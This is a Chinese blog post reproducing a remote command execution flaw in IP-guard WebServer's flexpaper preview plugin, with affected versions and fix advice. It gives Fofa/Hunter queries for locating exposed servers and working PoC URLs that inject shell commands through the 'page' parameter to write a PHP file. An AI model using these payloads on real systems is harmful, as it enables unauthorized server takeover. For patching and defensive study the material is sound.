【IP-guard WebServer 远程命令执行漏洞复现(0day)】

最新推荐文章于 2024-04-27 16:55:10 发布
最新推荐文章于 2024-04-27 16:55:10 发布
阅读量2.8k 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/134325465
版权

文章目录

一、漏洞说明

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
IP-guard Webserver远程命令执行漏洞(RCE)的问题,是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,新版本已不再使用 flexpaper。

二、影响版本

受影响的范围,即有使用文件预览功能的web系统

溢信科技 IP-guard<4.81.0307.0

三、资产测绘

Fofa语法:
app="IP-guard"
Hunter语法:
web.title="IP-guard"

四、漏洞复现

1、来到web访问界面
在这里插入图片描述

2、bp抓包修改数据包
poc:

/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+^%3C?php+phpinfo();+?^%3E+%3Esany.php
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+123456+>test.txt

在这里插入图片描述

/ipg/static/appr/lib/flexpaper/php/test.txt

在这里插入图片描述
可执行写入的命令,可造成重大危害。

五、修复建议

临时防护方案:

1.加强系统和网络的访问控制,修改防火墙策略,不将非必要服务暴露于公网;
2.在公网部署的系统,通过WAF限制外网对"/ipg/static/appr/lib/flexpaper/php/view.php"路径的访问;
3.定期对服务器上的网站后门文件进行及时查杀。

正式防护方案:

官方已修复该漏洞,建议用户更新到安全版本。
安全版本:
IP-guard WebServer >= 4.81.0307.0
下载链接:
https://www.ip-guard.net/
一纸-荒芜
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现IP-guard WebServer 远程命令执行
失心少年
11-17 832
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。攻击者可利用该漏洞执行任意命令,获取服务器控制权限。1.利用如下POC进行Dnslog测试。
IP-guard WebServer 权限绕过漏洞复现(QVD-2024-14103)
0xSec
04-18 847
2024年4月,互联网上披露IP-guardWebServer权限绕过漏洞情报,攻击者可利用该漏洞读取配置文件,获取数据库权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
IP-Guard初级工程师认证培训资料
01-08
IP-guard企业信息监管系统,是一款领先的内网安全软件,它能够协助企业解决最棘手的内网安全问题,借助IP-guard强大的功能,企业能够有效地进行用户行为管理,防范信息外泄,文档透明加密,敏感内容识别管理系统DLP,准入控制,桌面运维,网络控制,资产管理,文档云备份等强大功能营造健康安全网络环境。
GoAhead Web服务器远程命令执行漏洞(CVE-2017-17562)漏洞复现
Amdy_amdy的博客
09-26 3335
一、漏洞概述: 1、漏洞简介: GoAhead Web Server,它是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。 GoAhead Web Server是跨平台的服务器软件,可以稳定地运行在Windows,Linux和Mac OS X操作系统之上。GoAhead Web Server是开放源代码的,这意味着你可以随意修改Web服务器的功能。...
IP-guard Webserver view 远程命令执行漏洞【2023最新漏洞
holyxp的博客
11-12 2449
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
(环境搭建+复现)CVE-2019-16278 Nostromo Web服务器的远程命令执行
daxi0ng的博客
03-13 1629
【CNVD编号】 CVE-2019-16278 【漏洞名称】 Nostromo Web服务器的远程命令执行 1【靶标分类】 web中间件漏洞 2【漏洞分类】 命令执行 3【漏洞等级】 高 4【漏洞简介】 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的...
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
wecanning的博客
11-10 639
关于IP-guard WebServer 远程命令执行漏洞的学习和自动化验证
IP-guard WebServer RCE漏洞复现
0xSec
11-09 2725
IP-guard WebServer存在远程命令执行漏洞情报。攻击者可利用该漏洞执行任意命令,获取服务器控制权限
漏洞复现--IP-guard flexpaper RCE
qq_53003652的博客
11-13 631
IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。该产品存在远程命令执行漏洞。攻击者可利用该漏洞执行任意命令直接获取服务器权限。ping后加上dnslog验证。
漏洞复现IP-guard WebServer 权限绕过漏洞
最新发布
qq_67810151的博客
04-27 381
IP-guard WebServer权限验证机制中存在设计缺陷,未授权的攻击者能够规避安全验证,通过后端接口执行文件的任意读取和删除操作。
IP-guard产品测试用例(全模块).pdf
02-14
IP-guard桌面管理系统,运用全面而细致地从文档操作管理、即时通讯、邮件管控、资产管理、移动存储设备、上网行为管理、屏幕监控、系统管理等方面进行详尽细致审计、全面严格管控和安全稳定的加密,满足企业防止信息...
IP-guard 双机热备使用说明
10-10
双机热备使用说明 一、简介 服务器双机热备功能把主从服务器、数据库分别部署到 3 台机器上,实现主-从服务器 共享一个数据库,并且保持三者之间的通讯。当主服务器出现故障时,从服务器能及时响应 ...
IP-Guard的LINUX客户端用户手册.pdf
04-08
连着同一台服务器的linux与windows客户端,2者之间的密文可通用,即在windows加密客户端上编辑的代码(密文),拿到linux加密客户端机器上也可编译;linu加密客户端上编译生成的密文,在windows加密客户端下也可正常...
HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现
dzqxwzoe的博客
09-19 132
最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。
漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
七天
12-02 2161
文章目录一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。 Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh来实现路径穿越,而
IP-guard WebServer 命令执行漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-13 800
IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。影响版本:IP-guard<4.81.0307.0没有人规定,一朵花一定要成长为向日葵或者玫瑰。
IP-guard WebServer 任意文件读取漏洞复现
0xSec
04-04 640
由于IP-guard WebServer/ipg/static/appr/lib/flexpaper/php/view.php接口处未对用户输入的数据进行严格的校验和过滤。未经身份验证的攻击者可随意操纵doc参数读取系统内部配置文件造成信息泄露,使系统处于极不安全的状态。
ip-guard教程
11-26
IP-Guard 是一种网络安全软件,它可以帮助管理者监控和保护公司内部网络,防止未经授权的访问和数据泄露。下面是一个简单的 IP-Guard 教程,帮助你更好地了解这个软件的使用方法。 首先,你需要下载并安装 IP-Guard 软件。安装完成后,你需要设置管理员账号和密码,以便后续登录和管理软件。 接下来,你需要配置 IP-Guard 软件。可以设置访问控制规则,例如允许哪些 IP 地址访问公司的内部网络,禁止哪些 IP 地址访问等。另外,你还可以设置数据泄露防护规则,防止内部员工将公司的敏感数据传输到外部网络,确保公司数据的安全。 然后,你需要监控和审计公司的网络活动。IP-Guard 可以记录所有的网络访问记录,包括谁访问了哪些网站,下载了哪些文件等。通过对这些访问记录进行分析,你可以及时发现并阻止潜在的网络安全风险,保障公司网络安全。 最后,你需要定期维护和更新 IP-Guard 软件。网络安全威胁时刻在变化,保持软件的更新和升级可以帮助你更好地应对各种新的网络安全威胁,确保公司网络安全稳定运行。 以上就是一个简单的 IP-Guard 教程,希望能帮助你更好地了解和使用这款网络安全软件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值